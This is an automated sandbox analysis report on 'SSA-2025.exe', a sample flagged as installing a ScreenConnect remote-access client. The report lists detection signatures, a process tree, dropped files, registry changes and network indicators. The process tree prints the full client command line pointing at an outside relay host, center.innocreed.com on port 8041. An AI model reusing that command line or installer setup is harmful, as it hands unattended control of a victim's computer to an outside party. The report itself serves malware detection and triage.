Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SSA-2025.exe

Overview

General Information

Sample name:SSA-2025.exe
Analysis ID:1612325
MD5:ac6330f1b9cbf18004589b5f12db7bf4
SHA1:86b7d396e1c09fce6ced6d970f2a100e0e92e882
SHA256:efbbfc7a2ae03f5ee638cf26fa99a723bbd23ede3a054a8565d0fef355f87c17
Infos:

Detection

ScreenConnect Tool
Score:42
Range:0 - 100
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • SSA-2025.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\SSA-2025.exe" MD5: AC6330F1B9CBF18004589B5F12DB7BF4)
    • msiexec.exe (PID: 3928 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\b396bb1a05b88972\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 1776 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2448 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 77996A92415BC7E4E56BE4DDF3B31CAF C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 3328 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI5068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5329125 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 6412 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C8D888593058E7DDA6859E14664551F4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 5644 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 182E158D48F4BA225447276ED56B56FB E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 1656 cmdline: "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=center.innocreed.com&p=8041&s=6c62cec4-0045-44a2-9676-9cabae1b6b1b&k=BgIAAACkAABSU0ExAAgAAAEAAQD5eiIqIHsxbbvJUJju2o82x7Ep34oIQZtumNOfmF4LM6HXDbFuI5yxLKcIMB7dVhdMHCECqOoo0CzNTHKap5C2TNY0NNPZSQkyEv%2f%2fVaER%2b7e3LLhtH54iO65DKzgoQuj%2blt0GlYT7ExfyVq3FDxa2kOFj%2fgCEmsxgZjF%2f36qxt%2fdj%2bLbZb74bn%2bsm3SuHGI%2baXhPLm9qVqNy%2bY1x3H93WEGpGAakvhPnn0jZJGWrhcpCZG4tJ5sZjStPGzqo3h%2bo1QwwVG03T%2b1Dz72fUu9PeY5InprNAq1NGXCTH4b9yyDiryDlWVdI4XdnjPUI4WFw6QLO%2bUacmvAbLHh0v8nyd" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 3460 cmdline: "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe" "RunRole" "d9b4ef3e-cffc-4b3d-b5e1-180b85b6a477" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 2488 cmdline: "C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe" "RunRole" "fffce9a5-b0ba-47fb-9648-3719b7db50ee" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SSA-2025.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DFEC88B264B5E97F4C.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF550B457CA4B802ED.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DFCD11A12CC8450BDF.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Windows\Temp\~DFF35978247F72F933.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.2195384007.0000000005510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000009.00000002.3434546614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    0000000A.00000002.2284864737.00000000024B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 6 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (b396bb1a05b88972) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 1776, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-D1D8-A23813EFB81A}\(Default)

                        Suricata Signatures

                        No Suricata rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: SSA-2025.exeVirustotal: Detection: 30%Perma Link
                        Source: SSA-2025.exeReversingLabs: Detection: 26%
                        Source: C:\Users\user\Desktop\SSA-2025.exeEXE: msiexec.exeJump to behavior

                        Compliance

                        barindex
                        EXE planting / hijacking vulnerabilities found
                        Source: C:\Users\user\Desktop\SSA-2025.exeEXE: msiexec.exeJump to behavior
                        Uses 32bit PE files
                        Source: SSA-2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        PE / OLE file has a valid certificate
                        Source: SSA-2025.exeStatic PE information: certificate valid
                        Contains modern PE file flags such as dynamic base (ASLR) or NX
                        Source: SSA-2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Binary contains paths to debug symbols
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3434546614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284665209.0000000002352000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283881480.0000000000A10000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284864737.00000000024B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: SSA-2025.exe
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2215055403.0000000000EDD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: SSA-2025.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2185984964.0000000005141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2189534877.0000000004FD0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: SSA-2025.exe, MSI5CAE.tmp.3.dr, 515401.msi.3.dr, MSI56F0.tmp.3.dr, 515402.rbs.3.dr, 515403.msi.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2185984964.00000000050D2000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: SSA-2025.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3448893667.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                        Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: SSA-2025.exe, 515401.msi.3.dr, 515403.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284375998.00000000022F2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284375998.00000000022F2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                        Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3448893667.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3448893667.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: SSA-2025.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                        Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                        Networking

                        barindex
                        Enables network access during safeboot for specific services
                        Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                        Source: global trafficTCP traffic: 192.168.2.6:49717 -> 193.26.115.242:8041
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: center.innocreed.com
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: ScreenConnect.ClientService.exe, 00000008.00000002.3435324287.0000000002186000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284864737.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: rundll32.exe, 00000005.00000003.2185984964.0000000005141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2185984964.00000000050D2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2186164116.0000000004FD3000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                        Source: rundll32.exe, 00000005.00000003.2185984964.0000000005141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2185984964.00000000050D2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2186164116.0000000004FD3000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                        Source: rundll32.exe, 00000005.00000003.2185984964.0000000005141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2185984964.00000000050D2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2186164116.0000000004FD3000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                        Source: SSA-2025.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                        Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Reads the Security eventlog
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                        Reads the System eventlog
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                        System Summary

                        barindex
                        Detected potential unwanted application
                        Source: SSA-2025.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\515401.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B32F6256-B474-EE52-CAE8-109064941CE5}Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56C1.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56F0.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5CAE.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\515403.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\515403.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B32F6256-B474-EE52-CAE8-109064941CE5}Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B32F6256-B474-EE52-CAE8-109064941CE5}\DefaultIconJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{B32F6256-B474-EE52-CAE8-109064941CE5}.SchedServiceConfig.rmiJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (b396bb1a05b88972)Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (b396bb1a05b88972)\flqq42qy.tmpJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (b396bb1a05b88972)\flqq42qy.newcfgJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI56F0.tmpJump to behavior
                        Source: SSA-2025.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: SSA-2025.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: SSA-2025.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: SSA-2025.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: SSA-2025.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
